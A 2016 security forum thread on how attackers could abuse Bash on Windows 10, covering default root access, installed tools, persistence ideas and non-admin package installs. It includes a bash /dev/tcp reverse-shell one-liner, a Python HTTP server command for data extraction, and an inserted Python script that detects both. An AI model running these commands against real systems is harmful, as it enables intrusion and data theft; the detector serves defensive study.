_VL_ 79
Posted April 13, 2016

I assume everyone is familiar with this:

Quote
> You can now run Bash scripts, Linux command-line tools like sed, awk, grep, and you can even try Linux-first tools like Ruby, Git, Python, etc. directly on Windows. You can also access your Windows filesystem from within Bash allowing you to work on the same set of files using your preferred Windows tools or Linux command-line tools
> https://blogs.windows.com/buildingapps/2016/03/30/run-bash-on-ubuntu-on-windows/

What advantages does this bring to an attacker if a developer installs this?

I installed Windows 10 on a VM and then went through the process of updating to Insider Preview build 14316. To start BASH you open cmd.exe and type in "bash" in the same way you would to start PowerShell from cmd. You'll notice that you instantly have root. There is no need to "su".

I tried writing to "C:\Windows" as a test and got a write permission error. I'm assuming it has something to do with how the Windows volume is mounted. I'm still trying to find a way around that.

I've only just begun playing with it, but so far I found the following installed by default:

- Netcat
- Perl
- Python

I was able to use the following payload to get a reverse listener:

    bash -i >& /dev/tcp/<ip_address>/<port> 0>&1

Since Python is installed this is another option for data extraction:

    python -m SimpleHTTPServer <port>

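A detection-side sketch for the two commands in the post above, added here as an example and not part of the original thread: it scans command-line strings (for instance from shell history or process-creation telemetry) for bash's /dev/tcp socket redirection and for Python's built-in HTTP server. The record layout, field names, rule names and sample entries are constructed for illustration.

```python
import re

# bash treats /dev/tcp/<host>/<port> (and /dev/udp/...) as a socket, not a file:
# redirecting to it opens a network connection without any extra tooling.
DEV_SOCKET = re.compile(r"/dev/(tcp|udp)/([^/\s'\"]+)/(\d+)")
INTERACTIVE = re.compile(r"\b(?:bash|sh)\s+-i\b")
# Python 2 "SimpleHTTPServer" / Python 3 "http.server"; both default to port 8000.
HTTP_SERVER = re.compile(
    r"\bpython[\d.]*\s+-m\s+(?:SimpleHTTPServer|http\.server)(?:\s+(\d+))?")


def scan(events):
    """Return one finding per suspicious pattern found in each command line."""
    findings = []
    for ev in events:
        cmd = ev["cmdline"]
        m = DEV_SOCKET.search(cmd)
        if m:
            findings.append({
                "user": ev["user"], "rule": "dev-socket-redirect",
                "proto": m.group(1), "host": m.group(2), "port": int(m.group(3)),
                # An interactive shell wired to a socket is the higher-severity case.
                "interactive_shell": bool(INTERACTIVE.search(cmd)),
            })
        m = HTTP_SERVER.search(cmd)
        if m:
            findings.append({
                "user": ev["user"], "rule": "adhoc-http-server",
                "port": int(m.group(1) or 8000),
            })
    return findings


# Constructed sample records (hypothetical layout; 192.0.2.0/24 is a documentation range).
SAMPLE = [
    {"user": "test", "cmdline": "bash -i >& /dev/tcp/192.0.2.10/4444 0>&1"},
    {"user": "test", "cmdline": "python -m SimpleHTTPServer 8080"},
    {"user": "test", "cmdline": "python -m SimpleHTTPServer"},
    {"user": "dev", "cmdline": "grep -r tcp /mnt/c/Users/dev/project"},
    {"user": "dev", "cmdline": "bash -c 'exec 3<>/dev/tcp/192.0.2.10/80'"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```
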
GiRa 459
Posted April 13, 2016

I still have to try it but the very first things that come to mind are:

- service for you plus bash or nc to get persistence
- check if there is a cron implementation of some kind
- check for ssh
- messing around with the *nix permissions vs the Windows permissions, I bet there is something funky there

bedrisertkaya 11
Posted April 13, 2016

Here is how you can install Bash under Windows:
http://www.howtogeek.com/249966/how-to-install-and-use-the-linux-bash-shell-on-windows-10/

_VL_ 79
Posted April 14, 2016

On 4/13/2016 at 1:30 AM, GiRa said:
> I still have to try it but the very first things that come to mind are:
> - service for you plus bash or nc to get persistence
> - check if there is a cron implementation of some kind
> - check for ssh
> - messing around with the *nix permissions vs the Windows permissions, I bet there is something funky there

SSH is installed as well as OpenSSH server:

Quote

    root@localhost:/mnt/c/Users/test# apt-get install openssh-server
    Reading package lists... Done
    Building dependency tree
    Reading state information... Done
    openssh-server is already the newest version.
    0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
    root@localhost:/mnt/c/Users/test#

Cron is also installed, much to my surprise.

Just found this article: http://www.pcworld.com/article/3051604/windows/linuxs-deadliest-command-doesnt-faze-bash-on-windows-10.html

Seems that Root != Administrator on Windows. That's important to note.

_VL_ 79
Posted April 14, 2016

Yes. I should have guessed this. Once I opened cmd.exe as administrator I then had permissions from within BASH to write to "C:\Windows".

_VL_ 79
Posted April 14, 2016

So this is interesting. I created a normal user on Windows 10 (not an administrator), switched to the account and had this experience:

Typed in "BASH". This made me type "y" again, download BASH from the Windows Store and install it. # remember that this is without Administrative rights.

I was then able to install whatever I want from BASH without administrative rights. Seems like this is ripe for abuse. One example, I was able to install NMAP. I did run into this when I tried to run a scan:

Quote

    root@localhost:/mnt/c/Users/test# nmap scanme.nmap.org

    Starting Nmap 6.40 ( http://nmap.org ) at 2016-04-14 22:44 UTC
    route_dst_netlink: cannot create AF_NETLINK socket: Invalid argument

Seems like they haven't completely integrated all of Linux networking features into BASH for Windows yet.

_VL_ 79
Posted April 14, 2016

I would never have thought that Microsoft had a Github account: https://github.com/Microsoft/BashOnWindows/issues/5